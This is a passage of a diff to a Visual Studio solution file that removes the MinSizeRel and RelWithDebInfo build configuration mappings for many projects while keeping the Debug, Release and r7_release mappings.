{405245AB-0071-4CB9-BFBE-ED4E2A987EFF}.Release|Win32.Build.0 = Release|Win32 {405245AB-0071-4CB9-BFBE-ED4E2A987EFF}.Release|x64.ActiveCfg = Release|x64 {405245AB-0071-4CB9-BFBE-ED4E2A987EFF}.Release|x64.Build.0 = Release|x64 - {405245AB-0071-4CB9-BFBE-ED4E2A987EFF}.RelWithDebInfo|Win32.ActiveCfg = Release|Win32 - {405245AB-0071-4CB9-BFBE-ED4E2A987EFF}.RelWithDebInfo|Win32.Build.0 = Release|Win32 - {405245AB-0071-4CB9-BFBE-ED4E2A987EFF}.RelWithDebInfo|x64.ActiveCfg = Release|x64 - {405245AB-0071-4CB9-BFBE-ED4E2A987EFF}.RelWithDebInfo|x64.Build.0 = Release|x64 {37E24F8F-1BD9-490B-8CD2-4768B89E5EAB}.Debug|Win32.ActiveCfg = Debug|Win32 {37E24F8F-1BD9-490B-8CD2-4768B89E5EAB}.Debug|Win32.Build.0 = Debug|Win32 {37E24F8F-1BD9-490B-8CD2-4768B89E5EAB}.Debug|x64.ActiveCfg = Debug|x64 {37E24F8F-1BD9-490B-8CD2-4768B89E5EAB}.Debug|x64.Build.0 = Debug|x64 - {37E24F8F-1BD9-490B-8CD2-4768B89E5EAB}.MinSizeRel|Win32.ActiveCfg = Release|Win32 - {37E24F8F-1BD9-490B-8CD2-4768B89E5EAB}.MinSizeRel|Win32.Build.0 = Release|Win32 - {37E24F8F-1BD9-490B-8CD2-4768B89E5EAB}.MinSizeRel|x64.ActiveCfg = Release|x64 - {37E24F8F-1BD9-490B-8CD2-4768B89E5EAB}.MinSizeRel|x64.Build.0 = Release|x64 {37E24F8F-1BD9-490B-8CD2-4768B89E5EAB}.r7_release|Win32.ActiveCfg = r7_release|Win32 {37E24F8F-1BD9-490B-8CD2-4768B89E5EAB}.r7_release|Win32.Build.0 = r7_release|Win32 {37E24F8F-1BD9-490B-8CD2-4768B89E5EAB}.r7_release|x64.ActiveCfg = r7_release|x64 @@ -144,18 +120,10 @@ Global {37E24F8F-1BD9-490B-8CD2-4768B89E5EAB}.Release|Win32.Build.0 = Release|Win32 {37E24F8F-1BD9-490B-8CD2-4768B89E5EAB}.Release|x64.ActiveCfg = Release|x64 {37E24F8F-1BD9-490B-8CD2-4768B89E5EAB}.Release|x64.Build.0 = Release|x64 - {37E24F8F-1BD9-490B-8CD2-4768B89E5EAB}.RelWithDebInfo|Win32.ActiveCfg = Release|Win32 - {37E24F8F-1BD9-490B-8CD2-4768B89E5EAB}.RelWithDebInfo|Win32.Build.0 = Release|Win32 - {37E24F8F-1BD9-490B-8CD2-4768B89E5EAB}.RelWithDebInfo|x64.ActiveCfg = Release|x64 - {37E24F8F-1BD9-490B-8CD2-4768B89E5EAB}.RelWithDebInfo|x64.Build.0 = Release|x64 {C427F6B9-C287-4BDA-A5BB-401FC19E207C}.Debug|Win32.ActiveCfg = Debug|Win32 {C427F6B9-C287-4BDA-A5BB-401FC19E207C}.Debug|Win32.Build.0 = Debug|Win32 {C427F6B9-C287-4BDA-A5BB-401FC19E207C}.Debug|x64.ActiveCfg = Debug|x64 {C427F6B9-C287-4BDA-A5BB-401FC19E207C}.Debug|x64.Build.0 = Debug|x64 - {C427F6B9-C287-4BDA-A5BB-401FC19E207C}.MinSizeRel|Win32.ActiveCfg = Release|Win32 - {C427F6B9-C287-4BDA-A5BB-401FC19E207C}.MinSizeRel|Win32.Build.0 = Release|Win32 - {C427F6B9-C287-4BDA-A5BB-401FC19E207C}.MinSizeRel|x64.ActiveCfg = Release|x64 - {C427F6B9-C287-4BDA-A5BB-401FC19E207C}.MinSizeRel|x64.Build.0 = Release|x64 {C427F6B9-C287-4BDA-A5BB-401FC19E207C}.r7_release|Win32.ActiveCfg = r7_release|Win32 {C427F6B9-C287-4BDA-A5BB-401FC19E207C}.r7_release|Win32.Build.0 = r7_release|Win32 {C427F6B9-C287-4BDA-A5BB-401FC19E207C}.r7_release|x64.ActiveCfg = r7_release|x64 @@ -164,18 +132,10 @@ Global {C427F6B9-C287-4BDA-A5BB-401FC19E207C}.Release|Win32.Build.0 = Release|Win32 {C427F6B9-C287-4BDA-A5BB-401FC19E207C}.Release|x64.ActiveCfg = Release|x64 {C427F6B9-C287-4BDA-A5BB-401FC19E207C}.Release|x64.Build.0 = Release|x64 - {C427F6B9-C287-4BDA-A5BB-401FC19E207C}.RelWithDebInfo|Win32.ActiveCfg = Release|Win32 - {C427F6B9-C287-4BDA-A5BB-401FC19E207C}.RelWithDebInfo|Win32.Build.0 = Release|Win32 - {C427F6B9-C287-4BDA-A5BB-401FC19E207C}.RelWithDebInfo|x64.ActiveCfg = Release|x64 - {C427F6B9-C287-4BDA-A5BB-401FC19E207C}.RelWithDebInfo|x64.Build.0 = Release|x64 {CF56DDCC-505F-4D5C-AC2E-9787C7EF1504}.Debug|Win32.ActiveCfg = Debug|Win32 {CF56DDCC-505F-4D5C-AC2E-9787C7EF1504}.Debug|Win32.Build.0 = Debug|Win32 {CF56DDCC-505F-4D5C-AC2E-9787C7EF1504}.Debug|x64.ActiveCfg = Debug|x64 {CF56DDCC-505F-4D5C-AC2E-9787C7EF1504}.Debug|x64.Build.0 = Debug|x64 - {CF56DDCC-505F-4D5C-AC2E-9787C7EF1504}.MinSizeRel|Win32.ActiveCfg = Release|Win32 - {CF56DDCC-505F-4D5C-AC2E-9787C7EF1504}.MinSizeRel|Win32.Build.0 = Release|Win32 - {CF56DDCC-505F-4D5C-AC2E-9787C7EF1504}.MinSizeRel|x64.ActiveCfg = Release|x64 - {CF56DDCC-505F-4D5C-AC2E-9787C7EF1504}.MinSizeRel|x64.Build.0 = Release|x64 {CF56DDCC-505F-4D5C-AC2E-9787C7EF1504}.r7_release|Win32.ActiveCfg = r7_release|Win32 {CF56DDCC-505F-4D5C-AC2E-9787C7EF1504}.r7_release|Win32.Build.0 = r7_release|Win32 {CF56DDCC-505F-4D5C-AC2E-9787C7EF1504}.r7_release|x64.ActiveCfg = r7_release|x64 @@ -184,18 +144,10 @@ Global {CF56DDCC-505F-4D5C-AC2E-9787C7EF1504}.Release|Win32.Build.0 = Release|Win32 {CF56DDCC-505F-4D5C-AC2E-9787C7EF1504}.Release|x64.ActiveCfg = Release|x64 {CF56DDCC-505F-4D5C-AC2E-9787C7EF1504}.Release|x64.Build.0 = Release|x64 - {CF56DDCC-505F-4D5C-AC2E-9787C7EF1504}.RelWithDebInfo|Win32.ActiveCfg = Release|Win32 - {CF56DDCC-505F-4D5C-AC2E-9787C7EF1504}.RelWithDebInfo|Win32.Build.0 = Release|Win32 - {CF56DDCC-505F-4D5C-AC2E-9787C7EF1504}.RelWithDebInfo|x64.ActiveCfg = Release|x64 - {CF56DDCC-505F-4D5C-AC2E-9787C7EF1504}.RelWithDebInfo|x64.Build.0 = Release|x64 {662AFBB3-F64A-4AD1-8956-B9F1B846231C}.Debug|Win32.ActiveCfg = Debug|Win32 {662AFBB3-F64A-4AD1-8956-B9F1B846231C}.Debug|Win32.Build.0 = Debug|Win32 {662AFBB3-F64A-4AD1-8956-B9F1B846231C}.Debug|x64.ActiveCfg = Debug|x64 {662AFBB3-F64A-4AD1-8956-B9F1B846231C}.Debug|x64.Build.0 = Debug|x64 - {662AFBB3-F64A-4AD1-8956-B9F1B846231C}.MinSizeRel|Win32.ActiveCfg = Release|Win32 - {662AFBB3-F64A-4AD1-8956-B9F1B846231C}.MinSizeRel|Win32.Build.0 = Release|Win32 - {662AFBB3-F64A-4AD1-8956-B9F1B846231C}.MinSizeRel|x64.ActiveCfg = Release|x64 - {662AFBB3-F64A-4AD1-8956-B9F1B846231C}.MinSizeRel|x64.Build.0 = Release|x64 {662AFBB3-F64A-4AD1-8956-B9F1B846231C}.r7_release|Win32.ActiveCfg = r7_release|Win32 {662AFBB3-F64A-4AD1-8956-B9F1B846231C}.r7_release|Win32.Build.0 = r7_release|Win32 {662AFBB3-F64A-4AD1-8956-B9F1B846231C}.r7_release|x64.ActiveCfg = r7_release|x64 @@ -204,18 +156,10 @@ Global {662AFBB3-F64A-4AD1-8956-B9F1B846231C}.Release|Win32.Build.0 = Release|Win32 {662AFBB3-F64A-4AD1-8956-B9F1B846231C}.Release|x64.ActiveCfg = Release|x64 {662AFBB3-F64A-4AD1-8956-B9F1B846231C}.Release|x64.Build.0 = Release|x64 - {662AFBB3-F64A-4AD1-8956-B9F1B846231C}.RelWithDebInfo|Win32.ActiveCfg = Release|Win32 - {662AFBB3-F64A-4AD1-8956-B9F1B846231C}.RelWithDebInfo|Win32.Build.0 = Release|Win32 - {662AFBB3-F64A-4AD1-8956-B9F1B846231C}.RelWithDebInfo|x64.ActiveCfg = Release|x64 - {662AFBB3-F64A-4AD1-8956-B9F1B846231C}.RelWithDebInfo|x64.Build.0 = Release|x64 {09DF8FBC-EDFB-44E6-ACE6-9C0F5A60AB1C}.Debug|Win32.ActiveCfg = Debug|Win32 {09DF8FBC-EDFB-44E6-ACE6-9C0F5A60AB1C}.Debug|Win32.Build.0 = Debug|Win32 {09DF8FBC-EDFB-44E6-ACE6-9C0F5A60AB1C}.Debug|x64.ActiveCfg = Debug|x64 {09DF8FBC-EDFB-44E6-ACE6-9C0F5A60AB1C}.Debug|x64.Build.0 = Debug|x64 - {09DF8FBC-EDFB-44E6-ACE6-9C0F5A60AB1C}.MinSizeRel|Win32.ActiveCfg = Release|Win32 - {09DF8FBC-EDFB-44E6-ACE6-9C0F5A60AB1C}.MinSizeRel|Win32.Build.0 = Release|Win32 - {09DF8FBC-EDFB-44E6-ACE6-9C0F5A60AB1C}.MinSizeRel|x64.ActiveCfg = Release|x64 - {09DF8FBC-EDFB-44E6-ACE6-9C0F5A60AB1C}.MinSizeRel|x64.Build.0 = Release|x64 {09DF8FBC-EDFB-44E6-ACE6-9C0F5A60AB1C}.r7_release|Win32.ActiveCfg = r7_release|Win32 {09DF8FBC-EDFB-44E6-ACE6-9C0F5A60AB1C}.r7_release|Win32.Build.0 = r7_release|Win32 {09DF8FBC-EDFB-44E6-ACE6-9C0F5A60AB1C}.r7_release|x64.ActiveCfg = r7_release|x64 @@ -224,18 +168,10 @@ Global {09DF8FBC-EDFB-44E6-ACE6-9C0F5A60AB1C}.Release|Win32.Build.0 = Release|Win32 {09DF8FBC-EDFB-44E6-ACE6-9C0F5A60AB1C}.Release|x64.ActiveCfg = Release|x64 {09DF8FBC-EDFB-44E6-ACE6-9C0F5A60AB1C}.Release|x64.Build.0 = Release|x64 - {09DF8FBC-EDFB-44E6-ACE6-9C0F5A60AB1C}.RelWithDebInfo|Win32.ActiveCfg = Release|Win32 - {09DF8FBC-EDFB-44E6-ACE6-9C0F5A60AB1C}.RelWithDebInfo|Win32.Build.0 = Release|Win32 - {09DF8FBC-EDFB-44E6-ACE6-9C0F5A60AB1C}.RelWithDebInfo|x64.ActiveCfg = Release|x64 - {09DF8FBC-EDFB-44E6-ACE6-9C0F5A60AB1C}.RelWithDebInfo|x64.Build.0 = Release|x64 {2FCCCE33-77E9-43F3-928E-DBF6B9340A62}.Debug|Win32.ActiveCfg = Debug|Win32 {2FCCCE33-77E9-43F3-928E-DBF6B9340A62}.Debug|Win32.Build.0 = Debug|Win32 {2FCCCE33-77E9-43F3-928E-DBF6B9340A62}.Debug|x64.ActiveCfg = Debug|x64 {2FCCCE33-77E9-43F3-928E-DBF6B9340A62}.Debug|x64.Build.0 = Debug|x64 - {2FCCCE33-77E9-43F3-928E-DBF6B9340A62}.MinSizeRel|Win32.ActiveCfg = Release|Win32 - {2FCCCE33-77E9-43F3-928E-DBF6B9340A62}.MinSizeRel|Win32.Build.0 = Release|Win32 - {2FCCCE33-77E9-43F3-928E-DBF6B9340A62}.MinSizeRel|x64.ActiveCfg = Release|x64 - {2FCCCE33-77E9-43F3-928E-DBF6B9340A62}.MinSizeRel|x64.Build.0 = Release|x64 {2FCCCE33-77E9-43F3-928E-DBF6B9340A62}.r7_release|Win32.ActiveCfg = r7_release|Win32 {2FCCCE33-77E9-43F3-928E-DBF6B9340A62}.r7_release|Win32.Build.0 = r7_release|Win32 {2FCCCE33-77E9-43F3-928E-DBF6B9340A62}.r7_release|x64.ActiveCfg = r7_release|x64 @@ -244,34 +180,18 @@ Global {2FCCCE33-77E9-43F3-928E-DBF6B9340A62}.Release|Win32.Build.0 = Release|Win32 {2FCCCE33-77E9-43F3-928E-DBF6B9340A62}.Release|x64.ActiveCfg = Release|x64 {2FCCCE33-77E9-43F3-928E-DBF6B9340A62}.Release|x64.Build.0 = Release|x64 - {2FCCCE33-77E9-43F3-928E-DBF6B9340A62}.RelWithDebInfo|Win32.ActiveCfg = Release|Win32 - {2FCCCE33-77E9-43F3-928E-DBF6B9340A62}.RelWithDebInfo|Win32.Build.0 = Release|Win32 - {2FCCCE33-77E9-43F3-928E-DBF6B9340A62}.RelWithDebInfo|x64.ActiveCfg = Release|x64 - {2FCCCE33-77E9-43F3-928E-DBF6B9340A62}.RelWithDebInfo|x64.Build.0 = Release|x64 {BF0C0D6E-9119-4518-A3BC-2CF99C0E27D9}.Debug|Win32.ActiveCfg = Debug|Win32 {BF0C0D6E-9119-4518-A3BC-2CF99C0E27D9}.Debug|x64.ActiveCfg = Debug|x64 - {BF0C0D6E-9119-4518-A3BC-2CF99C0E27D9}.MinSizeRel|Win32.ActiveCfg = r7_release|Win32 - {BF0C0D6E-9119-4518-A3BC-2CF99C0E27D9}.MinSizeRel|Win32.Build.0 = r7_release|Win32 - {BF0C0D6E-9119-4518-A3BC-2CF99C0E27D9}.MinSizeRel|x64.ActiveCfg = r7_release|x64 - {BF0C0D6E-9119-4518-A3BC-2CF99C0E27D9}.MinSizeRel|x64.Build.0 = r7_release|x64 {BF0C0D6E-9119-4518-A3BC-2CF99C0E27D9}.r7_release|Win32.ActiveCfg = r7_release|Win32 {BF0C0D6E-9119-4518-A3BC-2CF99C0E27D9}.r7_release|Win32.Build.0 = r7_release|Win32 {BF0C0D6E-9119-4518-A3BC-2CF99C0E27D9}.r7_release|x64.ActiveCfg = r7_release|x64 {BF0C0D6E-9119-4518-A3BC-2CF99C0E27D9}.r7_release|x64.Build.0 = r7_release|x64 {BF0C0D6E-9119-4518-A3BC-2CF99C0E27D9}.Release|Win32.ActiveCfg = r7_release|Win32 {BF0C0D6E-9119-4518-A3BC-2CF99C0E27D9}.Release|x64.ActiveCfg = r7_release|x64 - {BF0C0D6E-9119-4518-A3BC-2CF99C0E27D9}.RelWithDebInfo|Win32.ActiveCfg = r7_release|Win32 - {BF0C0D6E-9119-4518-A3BC-2CF99C0E27D9}.RelWithDebInfo|Win32.Build.0 = r7_release|Win32 - {BF0C0D6E-9119-4518-A3BC-2CF99C0E27D9}.RelWithDebInfo|x64.ActiveCfg = r7_release|x64 - {BF0C0D6E-9119-4518-A3BC-2CF99C0E27D9}.RelWithDebInfo|x64.Build.0 = r7_release|x64 {42E143CB-6086-4FF1-A4AE-D8545782DD31}.Debug|Win32.ActiveCfg = Debug|Win32 {42E143CB-6086-4FF1-A4AE-D8545782DD31}.Debug|Win32.Build.0 = Debug|Win32 {42E143CB-6086-4FF1-A4AE-D8545782DD31}.Debug|x64.ActiveCfg = Debug|x64 {42E143CB-6086-4FF1-A4AE-D8545782DD31}.Debug|x64.Build.0 = Debug|x64 - {42E143CB-6086-4FF1-A4AE-D8545782DD31}.MinSizeRel|Win32.ActiveCfg = Release|Win32 - {42E143CB-6086-4FF1-A4AE-D8545782DD31}.MinSizeRel|Win32.Build.0 = Release|Win32 - {42E143CB-6086-4FF1-A4AE-D8545782DD31}.MinSizeRel|x64.ActiveCfg = Release|x64 - {42E143CB-6086-4FF1-A4AE-D8545782DD31}.MinSizeRel|x64.Build.0 = Release|x64 {42E143CB-6086-4FF1-A4AE-D8545782DD31}.r7_release|Win32.ActiveCfg = r7_release|Win32 {42E143CB-6086-4FF1-A4AE-D8545782DD31}.r7_release|Win32.Build.0 = r7_release|Win32 {42E143CB-6086-4FF1-A4AE-D8545782DD31}.r7_release|x64.ActiveCfg = r7_release|x64 @@ -280,18 +200,10 @@ Global {42E143CB-6086-4FF1-A4AE-D8545782DD31}.Release|Win32.Build.0 = Release|Win32 {42E143CB-6086-4FF1-A4AE-D8545782DD31}.Release|x64.ActiveCfg = Release|x64 {42E143CB-6086-4FF1-A4AE-D8545782DD31}.Release|x64.Build.0 = Release|x64 - {42E143CB-6086-4FF1-A4AE-D8545782DD31}.RelWithDebInfo|Win32.ActiveCfg = Release|Win32 - {42E143CB-6086-4FF1-A4AE-D8545782DD31}.RelWithDebInfo|Win32.Build.0 = Release|Win32 - {42E143CB-6086-4FF1-A4AE-D8545782DD31}.RelWithDebInfo|x64.ActiveCfg = Release|x64 - {42E143CB-6086-4FF1-A4AE-D8545782DD31}.RelWithDebInfo|x64.Build.0 = Release|x64 {FB776F5E-BF58-478F-94EE-5B69D84DB9ED}.Debug|Win32.ActiveCfg = Debug|Win32 {FB776F5E-BF58-478F-94EE-5B69D84DB9ED}.Debug|Win32.Build.0 = Debug|Win32 {FB776F5E-BF58-478F-94EE-5B69D84DB9ED}.Debug|x64.ActiveCfg = Debug|x64 {FB776F5E-BF58-478F-94EE-5B69D84DB9ED}.Debug|x64.Build.0 = Debug|x64 - {FB776F5E-BF58-478F-94EE-5B69D84DB9ED}.MinSizeRel|Win32.ActiveCfg = Release|Win32 - {FB776F5E-BF58-478F-94EE-5B69D84DB9ED}.MinSizeRel|Win32.Build.0 = Release|Win32 - {FB776F5E-BF58-478F-94EE-5B69D84DB9ED}.MinSizeRel|x64.ActiveCfg = Release|x64 - {FB776F5E-BF58-478F-94EE-5B69D84DB9ED}.MinSizeRel|x64.Build.0 = Release|x64 {FB776F5E-BF58-478F-94EE-5B69D84DB9ED}.r7_release|Win32.ActiveCfg = r7_release|Win32 {FB776F5E-BF58-478F-94EE-5B69D84DB9ED}.r7_release|Win32.Build.0 = r7_release|Win32 {FB776F5E-BF58-478F-94EE-5B69D84DB9ED}.r7_release|x64.ActiveCfg = r7_release|x64 @@ -300,18 +212,10 @@ Global {FB776F5E-BF58-478F-94EE-5B69D84DB9ED}.Release|Win32.Build.0 = Release|Win32 {FB776F5E-BF58-478F-94EE-5B69D84DB9ED}.Release|x64.ActiveCfg = Release|x64 {FB776F5E-BF58-478F-94EE-5B69D84DB9ED}.Release|x64.Build.0 = Release|x64 - {FB776F5E-BF58-478F-94EE-5B69D84DB9ED}.RelWithDebInfo|Win32.ActiveCfg = Release|Win32 - {FB776F5E-BF58-478F-94EE-5B69D84DB9ED}.RelWithDebInfo|Win32.Build.0 = Release|Win32 - {FB776F5E-BF58-478F-94EE-5B69D84DB9ED}.RelWithDebInfo|x64.ActiveCfg = Release|x64 - {FB776F5E-BF58-478F-94EE-5B69D84DB9ED}.RelWithDebInfo|x64.Build.0 = Release|x64 {1C307A8B-A88E-43EE-8E80-01E6EFE38697}.Debug|Win32.ActiveCfg = Debug|Win32 {1C307A8B-A88E-43EE-8E80-01E6EFE38697}.Debug|Win32.Build.0 = Debug|Win32 {1C307A8B-A88E-43EE-8E80-01E6EFE38697}.Debug|x64.ActiveCfg = Debug|x64 {1C307A8B-A88E-43EE-8E80-01E6EFE38697}.Debug|x64.Build.0 = Debug|x64 - {1C307A8B-A88E-43EE-8E80-01E6EFE38697}.MinSizeRel|Win32.ActiveCfg = Release|Win32 - {1C307A8B-A88E-43EE-8E80-01E6EFE38697}.MinSizeRel|Win32.Build.0 = Release|Win32 - {1C307A8B-A88E-43EE-8E80-01E6EFE38697}.MinSizeRel|x64.ActiveCfg = Release|x64 - {1C307A8B-A88E-43EE-8E80-01E6EFE38697}.MinSizeRel|x64.Build.0 = Release|x64 {1C307A8B-A88E-43EE-8E80-01E6EFE38697}.r7_release|Win32.ActiveCfg = r7_release|Win32 {1C307A8B-A88E-43EE-8E80-01E6EFE38697}.r7_release|Win32.Build.0 = r7_release|Win32 {1C307A8B-A88E-43EE-8E80-01E6EFE38697}.r7_release|x64.ActiveCfg = r7_release|x64 @@ -320,18 +224,10 @@ Global {1C307A8B-A88E-43EE-8E80-01E6EFE38697}.Release|Win32.Build.0 = Release|Win32 {1C307A8B-A88E-43EE-8E80-01E6EFE38697}.Release|x64.ActiveCfg = Release|x64 {1C307A8B-A88E-43EE-8E80-01E6EFE38697}.Release|x64.Build.0 = Release|x64 - {1C307A8B-A88E-43EE-8E80-01E6EFE38697}.RelWithDebInfo|Win32.ActiveCfg = Release|Win32 - {1C307A8B-A88E-43EE-8E80-01E6EFE38697}.RelWithDebInfo|Win32.Build.0 = Release|Win32 - {1C307A8B-A88E-43EE-8E80-01E6EFE38697}.RelWithDebInfo|x64.ActiveCfg = Release|x64 - {1C307A8B-A88E-43EE-8E80-01E6EFE38697}.RelWithDebInfo|x64.Build.0 = Release|x64 {28D39E90-259B-4DCE-88A7-7D2B568809DC}.Debug|Win32.ActiveCfg = Debug|Win32 {28D39E90-259B-4DCE-88A7-7D2B568809DC}.Debug|Win32.Build.0 = Debug|Win32 {28D39E90-259B-4DCE-88A7-7D2B568809DC}.Debug|x64.ActiveCfg = Debug|x64 {28D39E90-259B-4DCE-88A7-7D2B568809DC}.Debug|x64.Build.0 = Debug|x64 - {28D39E90-259B-4DCE-88A7-7D2B568809DC}.MinSizeRel|Win32.ActiveCfg = Release|Win32 - {28D39E90-259B-4DCE-88A7-7D2B568809DC}.MinSizeRel|Win32.Build.0 = Release|Win32 - {28D39E90-259B-4DCE-88A7-7D2B568809DC}.MinSizeRel|x64.ActiveCfg = Release|x64 - {28D39E90-259B-4DCE-88A7-7D2B568809DC}.MinSizeRel|x64.Build.0 = Release|x64 {28D39E90-259B-4DCE-88A7-7D2B568809DC}.r7_release|Win32.ActiveCfg = r7_release|Win32 {28D39E90-259B-4DCE-88A7-7D2B568809DC}.r7_release|Win32.Build.0 = r7_release|Win32 {28D39E90-259B-4DCE-88A7-7D2B568809DC}.r7_release|x64.ActiveCfg = r7_release|x64 @@ -340,18 +236,10 @@ Global {28D39E90-259B-4DCE-88A7-7D2B568809DC}.Release|Win32.Build.0 = Release|Win32 {28D39E90-259B-4DCE-88A7-7D2B568809DC}.Release|x64.ActiveCfg = Release|x64 {28D39E90-259B-4DCE-88A7-7D2B568809DC}.Release|x64.Build.0 = Release|x64 - {28D39E90-259B-4DCE-88A7-7D2B568809DC}.RelWithDebInfo|Win32.ActiveCfg = Release|Win32 - {28D39E90-259B-4DCE-88A7-7D2B568809DC}.RelWithDebInfo|Win32.Build.0 = Release|Win32 - {28D39E90-259B-4DCE-88A7-7D2B568809DC}.RelWithDebInfo|x64.ActiveCfg = Release|x64 - {28D39E90-259B-4DCE-88A7-7D2B568809DC}.RelWithDebInfo|x64.Build.0 = Release|x64 {A29BE1E5-5122-4BD4-82CE-25418D29648E}.Debug|Win32.ActiveCfg = Debug|Win32 {A29BE1E5-5122-4BD4-82CE-25418D29648E}.Debug|Win32.Build.0 = Debug|Win32 {A29BE1E5-5122-4BD4-82CE-25418D29648E}.Debug|x64.ActiveCfg = Debug|x64 {A29BE1E5-5122-4BD4-82CE-25418D29648E}.Debug|x64.Build.0 = Debug|x64 - {A29BE1E5-5122-4BD4-82CE-25418D29648E}.MinSizeRel|Win32.ActiveCfg = Release|Win32 - {A29BE1E5-5122-4BD4-82CE-25418D29648E}.MinSizeRel|Win32.Build.0 = Release|Win32 - {A29BE1E5-5122-4BD4-82CE-25418D29648E}.MinSizeRel|x64.ActiveCfg = Release|x64 - {A29BE1E5-5122-4BD4-82CE-25418D29648E}.MinSizeRel|x64.Build.0 = Release|x64 {A29BE1E5-5122-4BD4-82CE-25418D29648E}.r7_release|Win32.ActiveCfg = r7_release|Win32 {A29BE1E5-5122-4BD4-82CE-25418D29648E}.r7_release|Win32.Build.0 = r7_release|Win32 {A29BE1E5-5122-4BD4-82CE-25418D29648E}.r7_release|x64.ActiveCfg = r7_release|x64 @@ -360,18 +248,10 @@ Global {A29BE1E5-5122-4BD4-82CE-25418D29648E}.Release|Win32.Build.0 = Release|Win32 {A29BE1E5-5122-4BD4-82CE-25418D29648E}.Release|x64.ActiveCfg = Release|x64 {A29BE1E5-5122-4BD4-82CE-25418D29648E}.Release|x64.Build.0 = Release|x64 - {A29BE1E5-5122-4BD4-82CE-25418D29648E}.RelWithDebInfo|Win32.ActiveCfg = Release|Win32 - {A29BE1E5-5122-4BD4-82CE-25418D29648E}.RelWithDebInfo|Win32.Build.0 = Release|Win32 - {A29BE1E5-5122-4BD4-82CE-25418D29648E}.RelWithDebInfo|x64.ActiveCfg = Release|x64 - {A29BE1E5-5122-4BD4-82CE-25418D29648E}.RelWithDebInfo|x64.Build.0 = Release|x64 {2A4FDCA0-A620-4E98-AF05-2B2F227F5166}.Debug|Win32.ActiveCfg = Debug|Win32 {2A4FDCA0-A620-4E98-AF05-2B2F227F5166}.Debug|Win32.Build.0 = Debug|Win32 {2A4FDCA0-A620-4E98-AF05-2B2F227F5166}.Debug|x64.ActiveCfg = Debug|x64 {2A4FDCA0-A620-4E98-AF05-2B2F227F5166}.Debug|x64.Build.0 = Debug|x64 - {2A4FDCA0-A620-4E98-AF05-2B2F227F5166}.MinSizeRel|Win32.ActiveCfg = Release|Win32 - {2A4FDCA0-A620-4E98-AF05-2B2F227F5166}.MinSizeRel|Win32.Build.0 = Release|Win32 - {2A4FDCA0-A620-4E98-AF05-2B2F227F5166}.MinSizeRel|x64.ActiveCfg = Release|x64 - {2A4FDCA0-A620-4E98-AF05-2B2F227F5166}.MinSizeRel|x64.Build.0 = Release|x64 {2A4FDCA0-A620-4E98-AF05-2B2F227F5166}.r7_release|Win32.ActiveCfg = r7_release|Win32 {2A4FDCA0-A620-4E98-AF05-2B2F227F5166}.r7_release|Win32.Build.0 = r7_release|Win32 {2A4FDCA0-A620-4E98-AF05-2B2F227F5166}.r7_release|x64.ActiveCfg = r7_release|x64 @@ -380,18 +260,10 @@ Global {2A4FDCA0-A620-4E98-AF05-2B2F227F5166}.Release|Win32.Build.0 = Release|Win32 {2A4FDCA0-A620-4E98-AF05-2B2F227F5166}.Release|x64.ActiveCfg = Release|x64 {2A4FDCA0-A620-4E98-AF05-2B2F227F5166}.Release|x64.Build.0 = Release|x64 - {2A4FDCA0-A620-4E98-AF05-2B2F227F5166}.RelWithDebInfo|Win32.ActiveCfg = Release|Win32 - {2A4FDCA0-A620-4E98-AF05-2B2F227F5166}.RelWithDebInfo|Win32.Build.0 = Release|Win32 - {2A4FDCA0-A620-4E98-AF05-2B2F227F5166}.RelWithDebInfo|x64.ActiveCfg = Release|x64 - {2A4FDCA0-A620-4E98-AF05-2B2F227F5166}.RelWithDebInfo|x64.Build.0 = Release|x64 {561E26D9-7E79-4EF4-8AA2-A770F81568A7}.Debug|Win32.ActiveCfg = Debug|Win32 {561E26D9-7E79-4EF4-8AA2-A770F81568A7}.Debug|Win32.Build.0 = Debug|Win32 {561E26D9-7E79-4EF4-8AA2-A770F81568A7}.Debug|x64.ActiveCfg = Debug|x64 {561E26D9-7E79-4EF4-8AA2-A770F81568A7}.Debug|x64.Build.0 = Debug|x64 - {561E26D9-7E79-4EF4-8AA2-A770F81568A7}.MinSizeRel|Win32.ActiveCfg = Release|Win32 - {561E26D9-7E79-4EF4-8AA2-A770F81568A7}.MinSizeRel|Win32.Build.0 = Release|Win32 - {561E26D9-7E79-4EF4-8AA2-A770F81568A7}.MinSizeRel|x64.ActiveCfg = Release|x64 - {561E26D9-7E79-4EF4-8AA2-A770F81568A7}.MinSizeRel|x64.Build.0 = Release|x64 {561E26D9-7E79-4EF4-8AA2-A770F81568A7}.r7_release|Win32.ActiveCfg = r7_release|Win32 {561E26D9-7E79-4EF4-8AA2-A770F81568A7}.r7_release|Win32.Build.0 = r7_release|Win32 {561E26D9-7E79-4EF4-8AA2-A770F81568A7}.r7_release|x64.ActiveCfg = r7_release|x64 @@ -400,18 +272,10 @@ Global {561E26D9-7E79-4EF4-8AA2-A770F81568A7}.Release|Win32.Build.0 = Release|Win32 {561E26D9-7E79-4EF4-8AA2-A770F81568A7}.Release|x64.ActiveCfg = Release|x64 {561E26D9-7E79-4EF4-8AA2-A770F81568A7}.Release|x64.Build.0 = Release|x64 - {561E26D9-7E79-4EF4-8AA2-A770F81568A7}.RelWithDebInfo|Win32.ActiveCfg = Release|Win32 - {561E26D9-7E79-4EF4-8AA2-A770F81568A7}.RelWithDebInfo|Win32.Build.0 = Release|Win32 - {561E26D9-7E79-4EF4-8AA2-A770F81568A7}.RelWithDebInfo|x64.ActiveCfg = Release|x64 - {561E26D9-7E79-4EF4-8AA2-A770F81568A7}.RelWithDebInfo|x64.Build.0 = Release|x64 {E61592E1-28F4-4AFC-9EE1-9BE833A061C1}.Debug|Win32.ActiveCfg = Debug|Win32 {E61592E1-28F4-4AFC-9EE1-9BE833A061C1}.Debug|Win32.Build.0 = Debug|Win32 {E61592E1-28F4-4AFC-9EE1-9BE833A061C1}.Debug|x64.ActiveCfg = Debug|x64 {E61592E1-28F4-4AFC-9EE1-9BE833A061C1}.Debug|x64.Build.0 = Debug|x64 - {E61592E1-28F4-4AFC-9EE1-9BE833A061C1}.MinSizeRel|Win32.ActiveCfg = Release|Win32 - {E61592E1-28F4-4AFC-9EE1-9BE833A061C1}.MinSizeRel|Win32.Build.0 = Release|Win32 - {E61592E1-28F4-4AFC-9EE1-9BE833A061C1}.MinSizeRel|x64.ActiveCfg = Release|x64 - {E61592E1-28F4-4AFC-9EE1-9BE833A061C1}.MinSizeRel|x64.Build.0 = Release|x64 {E61592E1-28F4-4AFC-9EE1-9BE833A061C1}.r7_release|Win32.ActiveCfg = Release|Win32 {E61592E1-28F4-4AFC-9EE1-9BE833A061C1}.r7_release|Win32.Build.0 = Release|Win32 